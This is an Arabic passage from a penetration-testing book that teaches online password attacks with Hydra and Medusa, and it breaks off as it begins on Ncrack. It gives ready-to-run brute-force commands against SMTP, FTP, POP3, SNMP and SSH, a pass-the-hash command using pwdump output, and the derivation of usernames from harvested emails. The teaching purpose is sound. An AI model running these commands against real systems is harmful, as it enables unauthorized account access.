ﻣﻠﺣوظﮫ :ﯾﺟب أن ﺗﻛون ﻋﻠﻰ ﻋﻠم ﺑﺄن ﺑﻌض اﻟﻧظم اﻟوﺻول ﻋن ﺑﻌد ﺗوظف ﺗﻘﻧﯾﺔ اﺧﺗﻧﺎق ﻛﻠﻣﺔ اﻟﻣرور ) (password throttlingواﻟﺗﻲ
ﯾﻣﻛن أن ﺗﺣد ﻋدد ﻣرات ﺗﺳﺟﯾل اﻟدﺧول اﻟﻔﺎﺷﻠﺔ اﻟﻣﺳﻣوح ﺑﮭﺎ ﻟك .ﻓﻲ ھذه اﻟﺣﺎﻻت ،ﯾﻣﻛن أن ﯾﺗم ﺣظر ﻋﻧوان IPاﻟﺧﺎص ﺑك أو ﯾﺗم ﻏﻠﻖ
اﺳم اﻟﻣﺳﺗﺧدم.
ھﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻛﺳر ﻛﻠﻣﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت) . (Online Password Crackerاﺛﻧﯾن ﻣن اﻷدوات
اﻷﻛﺛر ﺷﻌﺑﯾﺔ ھﻲ ﻣﯾدوﺳﺎ )(Medusaوھﯾدرا) .(Hydraھذه اﻷدوات ﻣﺗﺷﺎﺑﮭﺔ ﺟدا ﻓﻲ طﺑﯾﻌﺔ ﻋﻣﻠﮭﺎ.
أي ﺧدﻣﺔ )(serviceﻣوﺟودة ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺗطﻠب ﻣن اﻟﻣﺳﺗﺧدم ﺗﺳﺟﯾل اﻟدﺧول ھﻲ ﻋرﺿﺔ ﻟﮭﺟوم اﻟﺗﺧﻣﯾن). (password guessing
وﺗﺷﻣل ﺧدﻣﺎت اﻟﺷﺑﻛﺔ ﻣﺛل ،SQL ،IM ،LDAP ،TELNET ،SSH ،RDP ،SMB ،VNC ،IMAP ،POP3 ،HTTPوأﻛﺛر
ﻣن ذﻟك .ھﺟوم ﻛﻠﻣﺔ اﻟﺳر ﻋﺑر اﻹﻧﺗرﻧت ) (Online Password Attackﯾﻧطوي ﻋﻠﻰ إﺗﻣﺎم ﻋﻣﻠﯾﺔ اﻟﺗﺧﻣﯾن ﻣن أﺟل ﺗﺳرﯾﻊ اﻟﮭﺟوم
وﺗﺣﺳﯾن ﻓرص اﻟﺗﺧﻣﯾن اﻟﻧﺎﺟﺣﺔ.
اﻟﻣﺻدرhttp://www.thc.org :
رﻗم واﺣد ﻓﻲ أﻛﺑر اﻟﺛﻐرات اﻷﻣﻧﯾﺔ ھﻲ ﻛﻠﻣﺎت اﻟﺳر ،ﻛﻣﺎ ﯾظﮭر ﻓﻲ ﻛل دراﺳﺔ ﺣول أﻣﺎن ﻛﻠﻣﺔ اﻟﻣرور.
Hydraھﻲ أداه ﺗم ﺗطوﯾرھﺎ ﻣن ﻗﺑل ) The Hacker's Choice (THCواﻟﺗﻲ ﺗﺳﺗﺧدم أﺳﻠوب ھﺟوم brute forceﻟﻼﺧﺗﺑﺎر ﺿد
ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟﺑروﺗوﻛوﻻت اﻟﻣﺧﺗﻠﻔﺔ .ھﻲ اﻷداة اﻟﻣﺛﺎﻟﯾﺔ ﻟﻣﮭﺎﺟﻣﺔ أﻧظﻣﺔ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﺣﯾث ان Hydraﯾﻣﻛﻧﮭﺎ اﺳﺗﮭداف IP
وﺑروﺗوﻛول ﻣﺣددة ﻣﺛل ﺣﺳﺎب اﻟﻣﺷرف ل POP3و SMTPاﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل أﻧظﻣﺔ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ.
ﺗم اﺧﺗﺑﺎر Hydraﻟﻛﻲ ﺗﻌﻣل ﺟﯾدا ﻋﻠﻰ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل FreeBSD 8.1 ،Solaris 11 ،Windows/Cygwin ،Linuxو.OSX
Hydraﺗدﻋم اﻟﻌدﯾد ﻣن اﻟﺑروﺗوﻛوﻻت ،واﻟﺗﻲ ﺗﺷﻣل اﻻﺗﻲ:
ﯾﺗﺿﻣن ھﯾدرا دﻋم SSLوﺟزء ﻣن .Nessusھﯾدرا ﯾدﻋم ﻋدد ﻛﺑﯾر ﻣن اﻟﺑروﺗوﻛوﻻت واﻟﺗﻲ ﺗﻌرف ب. password brute force tool
ﻟﻛن ﯾﺟب ان ﺗﻛون ﻋﻠﻰ ﺣذر ﻋﻠﻰ اﻟرﻏم ﻣن ذﻟك ،ﻷن ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﯾﻣﻛن أن ﯾﻛون ﺻﺎﺧﺑﺎ ﺑﻌض اﻟﺷﻲء ،ﻣﻣﺎ ﯾزﯾد ﻣن ﻓرﺻﺔ
اﻟﻛﺷف ﻋﻧك .ھذه اﻷداة ھو دﻟﯾل ﻣن اﻟﺗﻌﻠﯾﻣﺎت اﻟﺑرﻣﺟﯾﺔ اﻟﻣﻔﮭوﻣﺔ ،وذﻟك ﻹﻋطﺎء اﻟﺑﺎﺣﺛﯾن واﺳﺗﺷﺎري اﻷﻣن اﻣﻛﺎﻧﯾﺔ اظﮭﺎر ﻛﯾف أﻧﮫ ﺳﯾﻛون
ﻣن اﻟﺳﮭل اﻟوﺻول اﻟﻐﯾر ﻣﺻرح ﺑﮫ ﻣن ﺑﻌﯾد إﻟﻰ اﻟﻧظﺎم.
ﻗﺑل إطﻼق ھﯾدرا ،ﯾﺟب إﺟراء ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع ﻋﻠﻰ اﻟﮭدف ﻣﺛل ﻧظﺎم اﻟﺑرﯾد ﻛﻣﺎ ﺗم ﺷرﺣﮫ ﻓﻲ اﻟﻔﺻول اﻟﺳﺎﺑﻘﺔ .ﻣﺛل اﻷداة .nmap
ﻟﻠوﺻول اﻟﻰ ھﯾدرا ﻣن ﻛﺎﻟﻲ ،ﯾﻣﻛﻧك ذﻟك ﻣن ﺧﻼل ﻗﺎﺋﻣﺔ أدوات ﻛﺎﻟﻲ ﻧﻧﺗﻘل إﻟﻰ
Password Attacks | Online Attacks | Hydra
وھذا ﺳوف ﯾﻔﺗﺢ ﻟك ﻧﺎﻓذة اﻟﺗرﻣﻧﺎل واﻟﺗﻲ ﺳوف ﺗﻘوم ﺑﺗﺷﻐﯾل ھﯾدرا.
ﺗوﺿﺢ اﻟوﺛﺎﺋﻖ ﻛﯾﻔﯾﺔ ﺗﺷﻐﯾل ھﯾدرا .ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،إذا ﻛﻧت ﺗرﯾد أن ﺗﮭﺎﺟم ﻣﻠف ﻛﻠﻣﺔ اﻟﻣرور ﻟﺣﺳﺎب ﻣﺷرف اﻟذي ﯾﻘﻊ ﻓﻲ
192.168.1.1ﺑﺎﺳﺗﺧدام ، SMTPﺳﺗﻛﺗب اﻻﺗﻲ:
#hydra -l admin -p /root/password.txt 192.168.1.1 smtp
اﻟﺗﻌﺑﯾر –Pﯾﺷﯾر اﻟﻰ اﻟﻣﺳﺎر اﻟذي ﯾوﺟد ﺑﮫ ﻗﺎﺋﻣﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﺳوف ﯾﺳﺗﺧدﻣﮭﺎ ،و –Lﯾﺷﯾر اﻟﻰ ﻗﺎﺋﻣﺔ أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن.
ﻟﻠﮭﯾدرا أﯾﺿﺎ واﺟﮭﮫ رﺳوﻣﯾﮫ واﻟﺗﻲ ﯾﻣﻛﻧك اﺳﺗﺧداﻣﮭﺎ إذا ﻛﻧت ﺗﻔﺿل اﺳﺗﺧدام اﻟوﺟﮫ اﻟرﺳوﻣﯾﺔ ﺳواء ﻓﻲ ﻟﯾﻧﻛس او وﯾﻧدوز.
ﻟﻠوﺻول اﻟﻰ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ hydra-gtkﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻋن طرﯾﻖ اﺗﺑﺎع اﻻﺗﻲ:
Applications | Kali Linux | Password Attacks | Online Attacks | hydra-gtk
ﻋﻧد اﻟﺿﻐط ﻋﻠﯾﮫ ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ:
اﻵن ﺑﻌد أن ﺑدأﻧﺎ ﻣﻊ ھﯾدرا ،ﻓﻧﺣن ﺳوف ﻧﺣﺗﺎج إﻟﻰ ﺗﻌﯾﯾن ﻗواﺋم اﻟﻛﻠﻣﺎت ) .(Word listﻧﻧﻘر ﻓوق ﻋﻼﻣﺔ اﻟﺗﺑوﯾب .Passwordsﺳوف
ﻧﺳﺗﺧدم ﻗﺎﺋﻣﺔ اﺳم اﻟﻣﺳﺗﺧدم وﻗﺎﺋﻣﺔ ﻛﻠﻣﺔ اﻟﻣرور .ﯾﺗم ذﻟك ﺑﺈدﺧﺎل اﺳم اﻟﻣوﻗﻊ ﻟﻘﺎﺋﻣﺔ اﺳم اﻟﻣﺳﺗﺧدم وﻗﺎﺋﻣﺔ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك .وﻧﺧﺗﺎر
أﯾﺿﺎ Loop around usersو.Try empty password
ھﻧﺎ ﻓﻲ ﻣﺛﺎﻟﻧﺎ ھذا ﺳوف ﻧﺧﺗﺎر اﻟﻘواﺋم اﻟﺗﺎﻟﯾﺔ:
Username List: /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser-passwd/names/nameslist.txt
Password List: /usr/share/wfuzz/wordlist/fuzzdb/wordlistsuser-passwd/passwds/john.txt
اﻟﺧطوة اﻟﻣﻘﺑﻠﺔ ،ﺳوف ﻧﻘوم ﺑﺗﺣدﯾد طﺑﯾﻌﺔ اﻟﮭﺟوم وﯾﺗم ذﻟك ﺑﺎﻟﻧﻘر ﻓوق ﻋﻼﻣﺔ اﻟﺗﺑوﯾب .Tuningﺗﺣت اﻟﺧﯾﺎر ،Performance Options
ﻧﻘوم ﺑوﺿﻊ ﻋدد اﻟﻣﮭﺎم ) (Number of tasksﻣن 16اﻟﻰ .2واﻟﺳﺑب ﻓﻲ ذﻟك ھو أﻧﻧﺎ ﻻ ﻧرﯾد ھذا اﻟﻌدد اﻟﻛﺑﯾر ﻣن اﻟﻌﻣﻠﯾﺎت اﻟﺟﺎرﯾﺔ واﻟﺗﻲ
ﻣن اﻟﻣﻣﻛن ان ﺗﺳﻘط اﻟﺧﺎدم .ﻧﺣن ﻧرﯾد أﯾﺿﺎ أن ﺗﻌﯾﯾن اﻟﺧﯾﺎر Exit after first found pairوھذا اﺧﺗﯾﺎري ﻋﻠﻰ ﺣﺳب اﻟرﻏﺑﺔ.
اﻣﺎ اﻟﺟزء اﻟﺛﺎﻧﻲ اﻟﻣوﺟود ﺗﺣت اﻟﺧﯾﺎر Use a HTTP/HTTPS Proxyﻓﮭو اﻟﻣﺳﺋول ﻋن إﻋدادت اﻟﺑروﻛﺳﻲ.
أﺧﯾرا ،ﺳوف ﻧذھب ﺑﻌد اﻟﻰ ھدﻓﻧﺎ .ﻧﻧﻘر ﻓوق ﻋﻼﻣﺔ اﻟﺗﺑوﯾب Targetوﻧﺣدد ھدﻓﻧﺎ واﻟﺑروﺗوﻛول اﻟذي ﻧود أن ﻧﮭﺎﺟﻣﮫ.
وأﺧﯾرا ،ﻓﺈﻧﻧﺎ ﻧﻘوم ﺑﺗﻧﻔﯾذ exploitﻣن ﺧﻼل اﻟﻧﻘر ﻋﻠﻰ ﻋﻼﻣﺔ اﻟﺗﺑوﯾب Startواﻟﺿﻐط ﻋﻠﻰ زر اﻟﺑدء .Start
وﻋﻧد إﯾﺟﺎد ﻧﺗﯾﺟﺔ ﺳوف ﺗظﮭر ﻣﺛل اﻟﺷﻛل اﻻﺗﻲ:
:ﻓﻲ ﯾﻠﻲ ﺑﻌض اﻷﻣﺛﻠﺔ ﻻﺳﺗﺧدام اﻟﮭﯾدرا ﻣﻊ اﻟﺑروﺗوﻛوﻻت اﻟﻣﺧﺗﻠﻔﺔ ﻣن ﺧﻼل ﺳطر اﻷواﻣر ﻛﺎﻻﺗﻰ
#hydra -l ftp -P passwords.txt -v 192.168.0.112 ftp
#hydra -l muts -P passwords.txt -v 192.168.0.112 pop3
#hydra -P passwords.txt -v 192.168.0.112 snmp
ﻣن أﺟل اﺳﺗﺧدام ﻣﯾدوﺳﺎ ،ﺗﺣﺗﺎج اﻟﻰ ﻋدة ﻗطﻊ ﻣن اﻟﻣﻌﻠوﻣﺎت ﺑﻣﺎ ﻓﻲ ذﻟك ﻋﻧوان IPاﻟﮭدف ،اﺳم ﻣﺳﺗﺧدم أو ﻗﺎﺋﻣﺔ اﺳم اﻟﻣﺳﺗﺧدم اﻟﺗﻲ ﺗﺣﺎول
اﺳﺗﺧداﻣﮭﺎ ﻓﻲ ﺗﺳﺟﯾل اﻟدﺧول وﻛﻠﻣﺔ ﻣرور أو ﻣﻠف اﻟﻘﺎﻣوس اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻌدﯾد ﻣن ﻛﻠﻣﺎت اﻟﻣرور ﻻﺳﺗﺧداﻣﮭﺎ ﻋﻧد ﺗﺳﺟﯾل اﻟدﺧول،
واﺳم اﻟﺧدﻣﺔ اﻟﺗﻲ ﺗﺣﺎول اﻟﻣﺻﺎدﻗﺔ ﻣﻌﮭﺎ وھذا ﻛﻣﺎ ﻓﻌﻠﻧﺎ ﺳﺎﺑﻘﺎ ﻣﻊ اﻟﮭﯾدرا.
واﺣدة ﻣن اﻟﻣﺗطﻠﺑﺎت اﻟﻣذﻛورة أﻋﻼه ھﻲ ﻗﺎﺋﻣﺔ اﻟﻘﺎﻣوس) . (Dictionary listﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن اﻧﺷﺎء ﻗﺎﻣوس ﻛﻠﻣﺔ اﻟﺳر اﻟﺧﺎﺻﺔ ﺑك،
ﻓﻌﻠﯾك أن ﺗﻘرر إذا ﻛﻧت ﺗﺳﯾر ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﺳﺟﯾل اﻟدﺧول ﺑﺎﺳم ﻣﺳﺗﺧدم واﺣد أو إذا ﻛﻧت ﺗرﻏب ﻓﻲ ﺗوﻓﯾر ﻗﺎﺋﻣﺔ ﻣن اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺣﺗﻣﻠﯾن.
إذا ﻛﺎﻧت ﻣﻛﺎﻓﺄة ﻋﻣﻠﯾﺔ اﻻﺳﺗطﻼع اﻟﺧﺎص ﺑك ھﻲ ﻗﺎﺋﻣﺔ ﻣن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن ،ﻓﻘد ﺗرﯾد أن ﺗﺑدأ ﻣﻊ ھؤﻻء .إذا ﻛﻧت ﻟم ﺗﻧﺟﺢ ﻓﻲ ﺟﻣﻊ أﺳﻣﺎء
اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ،ﻓﻘد ﺗرﻏب ﻓﻲ اﻟﺗرﻛﯾز ﻋﻠﻰ اﻟﻧﺗﺎﺋﺞ ﻣن ﻋﻧﺎوﯾن اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺗﻲ ﺗم ﺟﻣﻌﮭﺎ ﻣﻊ .harvesterﺗذﻛر ،ﯾﻣﻛن
ﻓﻲ ﻛﺛﯾر ﻣن اﻷﺣﯾﺎن أن اﻟﺟزء اﻷول ﻣن ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮫ ﻓﻲ ﺗوﻟﯾد اﺳم اﻟﻣﺳﺗﺧدم ﻟدوﻣﯾن.
ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،اﻓﺗرض أﻧﮫ ﺧﻼل اﺧﺗﺑﺎر اﻻﺧﺗراق اﻟﺧﺎص ﻟم ﺗﺗﻣﻛن ﻣن اﻟﻌﺛور ﻋﻠﻰ أي ﻣن أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن ﻟﻠدوﻣﯾن .وﻣﻊ ذﻟك ،ﻛﻧت
ﻗﺎدرا ﻋﻠﻰ ﻧﺑش ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ . ben.owned@example.comﻋﻧد اﺳﺗﺧدام ﻣﯾدوﺳﺎ ،ﯾوﺟد ﺧﯾﺎر وھو إﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻷﺳﻣﺎء
اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻣﺣﺗﻣﻠﯾن اﺳﺗﻧﺎدا إﻟﻰ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ .وﺗﺷﻣل ھذه ،ownedb ،bowned ،benowned ،ben.ownedوﻋدة
ﻣﺟﻣوﻋﺎت أﺧرى ﻣﺷﺗﻘﺔ ﻣن ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ .ﺑﻌد إﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻣن 10-5أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن ،ﻓﻣن اﻟﻣﻣﻛن ﺗﻐذﯾﺔ ھذه اﻟﻘﺎﺋﻣﺔ اﻟﻰ
ﻣﯾدوﺳﺎ وﻣﺣﺎوﻟﺔ دﻓﻊ ھﺟوم اﻟﻘوة اﻟﻐﺎﺷﻣﺔ ) (brute force attackاﻟﻰ طرﯾﻖ ﺧدﻣﺔ اﻟﻣﺻﺎدﻗﺔ ﻋن ﺑﻌد.
اﻵن ﺑﻌد أن أﺻﺑﺢ ﻟدﯾﻧﺎ ﻋﻧوان IPﻟﻠﮭدف ﻣﻊ ﺑﻌض اﻟﺧدﻣﺎت اﻟﻣﺻﺎدﻗﺔ ﻋن ﺑﻌد اﻟﻣﺻﺎدﻗﺔ )ﺳوف ﻧﻔﺗرض SSHﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل( ،ﻗﺎﻣوس
ﻛﻠﻣﺔ اﻟﻣرور واﺳم ﻣﺳﺗﺧدم واﺣد ﻋﻠﻰ اﻷﻗل ،ﻓﻧﺣن ﻋﻠﻰ اﺳﺗﻌداد ﻟﺗﺷﻐﯾل ﻣﯾدوﺳﺎ .ﻣن أﺟل ﺗﻧﻔﯾذ اﻟﮭﺟوم ،ﯾﻣﻛﻧك ﻓﺗﺢ اﻟﺗرﻣﻧﺎل وإﺻدار اﻷﻣر
اﻟﺗﺎﻟﻲ:
ﻧﺗوﻗف ﻟﺣظﺔ ھﻧﺎ ﻟدراﺳﺔ ھذا اﻷﻣر ﻣﻊ ﻣزﯾد ﻣن اﻟﺗﻔﺎﺻﯾل؛ ﺳوف ﻧﺣﺗﺎج إﻟﻰ ﺗﺧﺻﯾص اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﮭدف اﻟﺧﺎص ﺑك:
ﺣﯾث ﯾﺗم اﺳﺗﺧدام اﻟﻛﻠﻣﺔ اﻷوﻟﻰ " " medusaﻟﺑدء ﺑرﻧﺎﻣﺞ .brute forcingﯾﺗم اﺳﺗﺧدام " "-hﻟﺗﺣدﯾد ﻋﻧوان IPﻟﻠﻣﺿﯾف اﻟﮭدف .ﯾﺗم
اﺳﺗﺧدام " "-uﻟﻠدﻻﻟﺔ ﻋﻠﻰ اﺳم ﻣﺳﺗﺧدم واﺣد اﻟﺗﻲ ﺳوف ﺗﺳﺗﺧدﻣﮫ ﻣﯾدوﺳﺎ ﻟﻣﺣﺎوﻟﺔ ﺗﺳﺟﯾل اﻟدﺧول .إذا ﻗﻣت ﺑﺈﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻣن أﺳﻣﺎء
اﻟﻣﺳﺗﺧدﻣﯾن وﺗرﻏب ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﻠدﺧول ﻣﻊ ﻛل ﻣن اﻷﺳﻣﺎء اﻟواردة ﻓﻲ اﻟﻘﺎﺋﻣﺔ ،ﯾﻣﻛﻧك إﺻدار اﻟﺗﻌﺑﯾر " " -Uﻣﺗﺑوﻋﺎ ﺑﻣﺳﺎر اﻟﻣﻠف اﻟذي
ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﮫ ﺑﺄﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن .وﺑﺎﻟﻣﺛل ،ﯾﺗم اﺳﺗﺧدام " "-pﻟﺗﺣدﯾد ﻛﻠﻣﺔ ﻣرور واﺣدة ،ﻓﻲ ﺣﯾن ﯾﺗم اﺳﺗﺧدام " "-Pﻟﺗﺣدﯾد ﻗﺎﺋﻣﺔ ﺗﺣﺗوي
ﻋﻠﻰ اﻟﻌدﯾد ﻣن ﻛﻠﻣﺎت اﻟﻣرور "-P" .ﯾﺟب أن ﺗﻛون ﻣﺗﺑوﻋﺔ ﺑﺎﻟﻣوﻗﻊ اﻟﻔﻌﻠﻲ أو ﻣﺳﺎر ﻟﻣﻠف اﻟﻘﺎﻣوس .ﯾﺗم اﺳﺗﺧدام " "-Mﻟﺗﺣدﯾد اﻟﺧدﻣﺔ اﻟﺗﻲ
ﺗرﯾد ﻣﮭﺎﺟﻣﺗﮭﺎ .ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام ) (-n port_numberﻟﺗﺧﺻﯾص رﻗم اﻟﻣﻧﻔذ.
ﻟﺗوﺿﯾﺢ ھذا اﻟﮭﺟوم ،دﻋوﻧﺎ ﻧﺳﺗﺧدم ھذا اﻟﻣﺛﺎل .ﻟﻧﻔﺗرض أﻧﻧﺎ ﻗد ﺗم اﻟﺗﻌﺎﻗد ﻹﺟراء اﺧﺗﺑﺎر اﻻﺧﺗراق ﺿد ﺷرﻛﺔ " ."Example.comﺧﻼل
ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﻟدﯾﻧﺎ ﻣﻊ ،MetaGoofilﻓﻠﻘد اﻛﺗﺷﻔﻧﺎ ﻋن اﺳم اﻟﻣﺳﺗﺧدم " "ownedbوﻋﻧوان IPﻣن .192.168.18.132وﺑﻌد
ﻓﺣص اﻟﻣﻧﺎﻓذ اﻟﺧﺎﺻﺔ ﺑﺎﻟﮭدف ،ﻧﻛﺗﺷف أن اﻟﻣﻠﻘم SSHﻗﯾد اﻟﺗﺷﻐﯾل ﻋﻠﻰ اﻟﻣﻧﻔذ .22ﺑﺎﻻﻧﺗﻘﺎل إﻟﻰ اﻟﺧطوة ،3واﺣدة ﻣن أول اﻷﺷﯾﺎء اﻟﻘﯾﺎم ﺑﮫ
ھو ﻣﺣﺎوﻟﺔ دﻓﻊ ھﺟوم brute forcingﻓﻲ طرﯾﻘﻧﺎ إﻟﻰ اﻟﻣﻠﻘم .ﺑﻌد اﺷﺗﻌﺎل اﻟﺟﮭﺎز ھﺟوﻣﻧﺎ وﻓﺗﺢ ﻣﺣطﺔ ،وﻧﺣن ﻹﺻدار اﻷﻣر اﻟﺗﺎﻟﻲ:
#medusa –h 192.168.18.132 –u ownedb –P /usr/share/john/password.lst –M ssh
ﻣﻠﺣوظﮫ :إذا ﻛﻧت ﺗواﺟﮫ أي ﻣن اﻟﻣﺷﺎﻛل ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ ﻣﯾدوﺳﺎ )أو أي ﻣن اﻷدوات اﻷﺧرى اﻟﺗﻲ ﯾﺷﻣﻠﮭﺎ ھذا اﻟﻛﺗﺎب( ﻟﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ
اﻹﺻدار اﻟﺧﺎص ﺑك ﻣن ﻛﺎﻟﻲ ،ﻓﺈﻧﮫ ﻗد ﯾﻛون ﻣن اﻟﻣﻔﯾد إﻋﺎدة ﺗﺛﺑﯾت اﻟﺑرﻧﺎﻣﺞ .ﯾﻣﻛﻧك إﻋﺎدة ﺗﺛﺑﯾت ﻣﯾدوﺳﺎ ﻣﻊ اﻷواﻣر اﻟﺗﺎﻟﯾﺔ:
#apt-get remove medusa
#apt-get update
#apt-get install medusa
ﯾظﮭر اﻟﺳطر اﻷول اﻷﻣر أﺻدرﻧﺎه ﻛﻣﺎ ذﻛرﻧﺎ ﺳﺎﺑﻘﺎ ﻓﻲ ﻣﺛﺎﻟﻧﺎ اﻟﺳﺎﺑﻖ؛ اﻟﺳطر اﻟﺛﺎﻧﻲ ھو راﯾﺔ إﻋﻼﻣﯾﺔ اﻟﺗﻲ ﯾﺗم ﻋرﺿﮭﺎ ﻋﻧدﻣﺎ ﯾﺑدأ اﻟﺑرﻧﺎﻣﺞ
اﻟﻌﻣل .اﻷﺳطر اﻟﻣﺗﺑﻘﯾﺔ ﺗظﮭر ﺳﻠﺳﻠﺔ ﻣن ﻣﺣﺎوﻻت اﻟدﺧول اﻵﻟﻲ ﻣﻊ اﺳم اﻟﻣﺳﺗﺧدم " " ownedbوﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﺗﺑدأ ب "
.“ 123456ﻻﺣظ ﻓﻲ اﻟﺳطر 11ﺣﯾث ﯾوﺟد إﺷﻌﺎر ﻣﺣﺎوﻟﺔ ﺗﺳﺟﯾل اﻟدﺧول ،ﺣﯾث ﻧﺟﺣت ﻣﯾدوﺳﺎ ﻓﻲ اﻟوﺻول إﻟﻰ اﻟﻧظﺎم ﺑﺎﺳﺗﺧدام اﺳم
ﻣﺳﺗﺧدم " " ownedbوﻛﻠﻣﺔ ﻣرور) . (Th3B@sicsﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﺳﻧﻛون ﻗﺎدرﯾن ﻋﻠﻰ اﻟدﺧول ﺑﺎﺳم اﻟﻣﺳﺗﺧدم ﻋن ﺑﻌد ﻣن ﺧﻼل ﻓﺗﺢ
اﻟﺗرﻣﻧﺎل واﻟﺗوﺻل إﻟﻰ اﻟﮭدف ﻋن طرﯾﻖ. SSH
ﻟﻘد ﻗﻣﻧﺎ ﻣن ﻗﺑل ﺑﺟﻣﻊ ﻋددا ﻣن ﻣﻠف SAMوﻣﻠف .Pwdumpﺣﯾث ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ ﯾﺳﺗطﯾﻊ Medusaﻗراءة ﻧﺎﺗﺞ PWDump
وﻓﺣص ﻛل ﺣﺳﺎب ﺿد ﻗﺎﺋﻣﺔ ﻣن اﻟﻣﺿﯾﻔﯾن .وﻣن اﻟﺟدﯾر ﺑﺎﻟذﻛر أن اﻟﻣﺋﺎت ﻣن اﻟﻧظم اﻟﻛﺛﯾرة ﯾﻣﻛن ﻓﺣﺻﮭﺎ ﻓﻲ ﺑﺿﻊ دﻗﺎﺋﻖ ﻓﻘط ﺑﺎﺳﺗﺧدام ھذا
اﻟﻧﮭﺞ.
#medusa -H hosts.txt -C pwdump.txt -M smbnt -m PASS:HASH
ﻟرؤﯾﺔ ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ﺑروﺗوﻛول ﻣﻌﯾن ﻣﻊ medusaﯾﻣﻛﻧك ذﻟك ﻋن طرﯾﻖ اﺻدار اﻻﻣر اﻟﺗﺎﻟﻲ ﻓﻲ اﻟﺗرﻣﻧﺎل ﺣﯾث اﺳﺗﺧدﻣﻧﺎ sshﻛﻣﺛﺎل
ﻟﻠﺑروﺗوﻛول اﻟﺗﻲ ﻧرﯾد اﻻﺳﺗﻌﻼم ﻋﻧﮫ:
#medusa -M smbnt -q
اﻟﻣﺻدرhttp://nmap.org/ncrack:
https://www.facebook.com/tibea2004 د .ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ
372
Ncrackھﻲ أداة ﻋﺎﻟﯾﺔ اﻟﺳرﻋﺔ ﻓﻲ ﻛﺳر ﻣﺻﺎدﻗﺔ اﻟﺷﺑﻛﺔ .ﺗم ﺑﻧﺎؤھﺎ ﻟﻣﺳﺎﻋدة اﻟﺷرﻛﺎت ﻋﻠﻰ ﺗﺄﻣﯾن ﺷﺑﻛﺎﺗﮭم ﻋن طرﯾﻖ اﺧﺗﺑﺎر اﺳﺗﺑﺎﻗﻲ
ﻟﺟﻣﯾﻊ ﻣﺿﯾﻔﯾﮭم واﻷﺟﮭزة اﻟﻣﻧﺻﺑﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﻣن اﺟل اﻟﻛﺷف ﻋن ﻛﻠﻣﺎت اﻟﺳر اﻟﺿﻌﯾﻔﺔ/اﻟﺧﺎطﺋﺔ .ﯾﻌﺗﻣد اﻟﻣﺗﺧﺻﺻﯾن ﻓﻲ ﻣﺟﺎل اﻷﻣن
أﯾﺿﺎ ﻋﻠﻰ Ncrackﻋﻧد ﻓﺣص ) (auditingﻋﻣﻼﺋﮭم" .اﻟﮭﺎﻛرز" أﺻﺑﺣوا اﻟﯾوم ﯾﺳﺗﺧدﻣوﻧﮭﺎ ﺑﺎﻟﺗوازي ﻣﻊ اداة اﻟﻔﺣص .Nmapﺣﯾث اﻧﮫ
